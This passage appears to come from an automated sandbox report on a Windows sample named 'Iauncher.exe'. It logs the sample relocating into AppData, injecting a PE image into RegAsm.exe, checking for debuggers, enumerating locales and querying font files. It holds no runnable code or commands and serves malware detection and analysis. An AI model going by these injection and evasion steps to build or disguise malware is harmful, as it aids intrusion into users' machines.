                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeCode function: 2_2_00F20E87 mov ecx, dword ptr fs:[00000030h]2_2_00F20E87
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeCode function: 2_2_00F2A789 mov eax, dword ptr fs:[00000030h]2_2_00F2A789
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeCode function: 2_2_00F2CD88 GetProcessHeap,2_2_00F2CD88
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeCode function: 2_2_00F1AAD3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00F1AAD3
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeCode function: 2_2_00F16A95 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00F16A95
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeCode function: 2_2_00F16D9F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00F16D9F
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeCode function: 2_2_00F16EFB SetUnhandledExceptionFilter,2_2_00F16EFB
                          Source: C:\Users\user\Desktop\Iauncher.exeMemory allocated: page read and write | page guardJump to behavior

                          HIPS / PFW / Operating System Protection Evasion

                          barindex
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 432000Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 450000Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 779008Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess created: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe "C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeCode function: 2_2_00F1687C cpuid 2_2_00F1687C
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeCode function: GetLocaleInfoW,2_2_00F2C828
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,2_2_00F2C1C2
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,2_2_00F2C951
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeCode function: GetLocaleInfoW,2_2_00F2CA57
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,2_2_00F2CB26
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeCode function: EnumSystemLocalesW,2_2_00F2C4AF
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeCode function: EnumSystemLocalesW,2_2_00F2C464
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,2_2_00F2C5D5
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeCode function: EnumSystemLocalesW,2_2_00F2C54A
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeCode function: GetLocaleInfoW,2_2_00F25D19
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeCode function: EnumSystemLocalesW,2_2_00F257F3
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Users\user\Desktop\Iauncher.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformationJump to behavior
